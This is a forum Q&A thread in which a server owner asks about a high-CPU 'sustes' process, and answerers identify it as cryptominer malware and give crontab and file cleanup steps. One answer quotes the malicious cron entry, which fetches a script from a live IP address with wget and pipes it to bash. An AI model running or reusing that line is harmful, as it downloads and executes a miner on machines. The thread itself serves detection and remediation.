What is this "sustes" in my process in my CPU stats?

July 11, 2018 9.4k views
Apache Ubuntu 16.04

Under CPU Processes I have one thread running high at 54.50 %
I have no clue what does it mean...

4 Answers

This is a cryptominer malware. You must delete it from your droplets.
First delete this cron job. It runs under user, which called process "sustes". You can find this username with "top" or in output of this comand:
ps aux | grep sustes

Then look at cron job of this user:
crontab -u username -l
If it has this string

then edit this crobjob
crontab -e -u username

or delete at all by
crontab -r -u username

Then delete these files
/var/tmp/sustes
/var/tmp/sustes3
/var/tmp/wc.conf
/var/tmp/123

  • Thanks for this, managed to get rid of it for a bit but keeps coming back.

    Any clues how to get rid of it completely?

    Reading about this malware it seems to have got in via SSH but that's now all locked down and passwords changed so it must be re-spawning itself from somewhere deeper.

Hello friend!

I'm afraid I have not heard of a process that identifies itself by that name, but that would generally be true of many applications that I have not personally used so it does not necessarily mean that anything is working other than in the intended way.

The short version of what this means is that software on your server is utilizing the CPU, and under an ideal scenario you would know what that software was in relation to how you set up the server and what that server's role is.

Going a bit deeper, I would SSH in and run "top" and then press C to reveal more about the process, particularly under the Command column. You should be able to see in more detail where it is being ran from and what user on the system is running it. From there your path is a bit more of an unwritten story, as what you do next depends heavily on what you want to do and whether or not that is something that should be running on your system.

Kind Regards,
Jarland

We've found a similar script/process.
Turned out our test server had been compromised and its actually been mining crypto currency.

Check the crontab file for the following:

* * * * * wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh > /dev/null 2>&1

Edit: not sure if I should remove the IP address

We also had the same problem, we were using activemq 5.9 which we suspected might have the vulnerability because after we updated it to latest, the process didn't started automatically. We observed on every friday, test server had this process automatically running.

Have another answer? Share your knowledge.